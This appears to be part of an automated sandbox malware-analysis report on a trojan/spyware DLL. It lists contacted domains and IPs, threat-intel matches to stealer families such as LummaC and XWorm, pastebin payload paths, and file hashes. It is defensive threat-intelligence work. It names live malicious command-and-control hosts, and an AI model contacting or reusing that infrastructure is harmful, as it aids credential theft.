                                                                                                                  https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://frogs-severz.sbs/aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://aka.ms/pscore6lBdqpowershell.exe, 00000008.00000002.1745042704.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000004831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://support.microsofaspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1745042704.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://frogs-severz.sbs/saspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://ipinfo.ipowershell.exe, 00000022.00000002.2258625366.0000000005EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://pastebin.compowershell.exe, 00000011.00000002.1887480681.000000000540D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.00000000053A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.00000000051CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://pastebin.compowershell.exe, 00000011.00000002.1887480681.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005369000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.00000000051AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005164000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004796000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    104.20.3.235
                                                                                                                                    pastebin.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    149.154.167.220
                                                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                                                    62041TELEGRAMRUfalse
                                                                                                                                    34.117.59.81
                                                                                                                                    ipinfo.ioUnited States
                                                                                                                                    139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                    192.81.132.76
                                                                                                                                    unknownUnited States
                                                                                                                                    63949LINODE-APLinodeLLCUStrue
                                                                                                                                    172.67.184.174
                                                                                                                                    revirepart.bizUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    104.21.88.250
                                                                                                                                    frogs-severz.sbsUnited States
                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                    Analysis ID:1561436
                                                                                                                                    Start date and time:2024-11-23 12:46:06 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 11m 7s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:47
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:SystemCoreHelper.dll
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.expl.evad.winDLL@60/52@5/6
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 33.3%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 90%
                                                                                                                                    • Number of executed functions: 148
                                                                                                                                    • Number of non-executed functions: 69
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .dll
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 3512 because it is empty
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 5436 because it is empty
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7516 because it is empty
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7664 because it is empty
                                                                                                                                    • Execution Graph export aborted for target rundll32.exe, PID 3120 because it is empty
                                                                                                                                    • Execution Graph export aborted for target rundll32.exe, PID 7188 because it is empty
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                    • VT rate limit hit for: SystemCoreHelper.dll
                                                                                                                                    TimeTypeDescription
                                                                                                                                    06:47:01API Interceptor251x Sleep call for process: powershell.exe modified
                                                                                                                                    06:47:03API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                                                                    06:47:27API Interceptor7x Sleep call for process: aspnet_regiis.exe modified
                                                                                                                                    06:47:50API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    104.20.3.235cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                                                                                    149.154.167.220file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                  order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                    Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        34.117.59.81FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                        172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                        VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                        UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                        I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                        licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                                                        • ipinfo.io/ip
                                                                                                                                                        build.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • ipinfo.io/ip
                                                                                                                                                        YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                        lePDF.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                        6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        ipinfo.ioy.batGet hashmaliciousBraodoBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        https://fxwf9-53194.portmap.io:53194/?x=sb232111Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        https://trimmer.to:443/GWHMYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        LzmJLVB41K.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        revirepart.bizb.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 104.21.43.198
                                                                                                                                                        injector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.43.198
                                                                                                                                                        hmjsOnyfSB.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        modest-menu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.43.198
                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.43.198
                                                                                                                                                        c2_Acid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        XRuncher_2.5.0.6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        Jorieh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        api.telegram.orgfile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        frogs-severz.sbsb.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 193.143.1.19
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        TELEGRAMRUfile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.21.33.116
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.67.179
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.20.178
                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                        • 172.67.162.84
                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.162.84
                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.21.33.116
                                                                                                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.162.84
                                                                                                                                                        loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 104.21.44.93
                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                        • 162.159.61.3
                                                                                                                                                        GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                        • 34.117.188.166
                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                        • 34.117.188.166
                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                        • 34.117.188.166
                                                                                                                                                        file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                        • 34.116.198.130
                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                        • 34.116.198.130
                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                        • 34.117.188.166
                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                        • 34.117.188.166
                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                        • 34.117.188.166
                                                                                                                                                        file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                        • 34.116.198.130
                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                        • 34.117.188.166
                                                                                                                                                        LINODE-APLinodeLLCUShttps://app.typeset.com/play/G4WZ1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 45.33.60.162
                                                                                                                                                        https://www.plushtoysmfg.com/plush-keychain-factory/Get hashmaliciousAnonymous ProxyBrowse
                                                                                                                                                        • 45.33.3.184
                                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 172.105.84.134
                                                                                                                                                        boatnet.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.237.135.249
                                                                                                                                                        boatnet.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.237.135.234
                                                                                                                                                        boatnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.104.165.127
                                                                                                                                                        https://hopp.bio/wchnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 173.230.149.18
                                                                                                                                                        fM7fKHA1rf.exeGet hashmaliciousXenoRATBrowse
                                                                                                                                                        • 96.126.118.61
                                                                                                                                                        exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                                                                        • 103.3.63.137
                                                                                                                                                        QWJfaEAROV.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                        • 139.162.100.28
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        es.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        https://identitys.fraudguard.es/SSA_Updated_StatementGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                        • 104.20.3.235
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        • 34.117.59.81
                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.184.174
                                                                                                                                                        • 104.21.88.250
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Roaming\gdi32.dllb.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):65536
                                                                                                                                                          Entropy (8bit):0.9754324830836212
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:yCd1lb/lzl9c6l9K0BU/rl8lLaWpFzuiFDZ24IO8llz:yCHp/ZHc6hBU/rWZaizuiFDY4IO8lZ
                                                                                                                                                          MD5:2AD9A15A4F833F3D4B4948CEBBBA2BC4
                                                                                                                                                          SHA1:5A26C963FC4B5391D8CD8DF8FA2C44B03085DC23
                                                                                                                                                          SHA-256:1CE1EA76E02D0B51AB8861992A6A014134255EE67744A74D235A8EFC0A2D6FA7
                                                                                                                                                          SHA-512:A2FEF6872DA8184955A5F4739B71B90D7C433B2D3ED7D77DA77BC212E46827535098D8365CF5BC55C7608E0EA58F5C5D598007CE554268C8AACC9DCE54005703
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.3.6.0.4.5.2.9.2.8.3.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.3.6.0.4.5.7.1.4.7.0.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.c.7.3.d.f.e.-.1.6.e.e.-.4.c.d.7.-.8.6.e.6.-.7.d.6.e.4.a.7.c.c.3.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.d.4.8.0.a.7.-.6.a.b.4.-.4.2.b.0.-.8.7.6.9.-.1.a.2.f.5.7.8.3.a.b.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.x.t.v.c.g.q.3.2.f.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.u.b.y.L.i.a.m.V.i.o.l.e.t...z.Y.O.f.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.0.0.-.0.0.0.1.-.0.0.1.4.-.0.b.9.7.-.a.d.7.6.9.d.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.c.a.e.a.a.9.d.7.5.a.f.4.5.5.5.e.c.c.6.3.6.7.d.d.3.2.c.d.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):65536
                                                                                                                                                          Entropy (8bit):0.9858964109227577
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:yunifycT1nKkd0BU/CaGpezuiFDZ24IO8bl:yuiacT1nDeBU/CahzuiFDY4IO8b
                                                                                                                                                          MD5:87E3303FEF09FA4A64FF2AD3CAE13D80
                                                                                                                                                          SHA1:2AAD730CC2F49013C627897C31A005C1D013E140
                                                                                                                                                          SHA-256:6685790E152E6A59E786868BD6CBA50ECA16BDCF849F0B58499864F65D9FF791
                                                                                                                                                          SHA-512:9793EE8954F343F15B23447AFAE66432DEE09CB861638D26B096BEC38211FBCAFCD9AA7772EFD5209F77E7E9237692AA7D302B18AFD5B3E6C6874B36FE819C00
                                                                                                                                                          Malicious:false
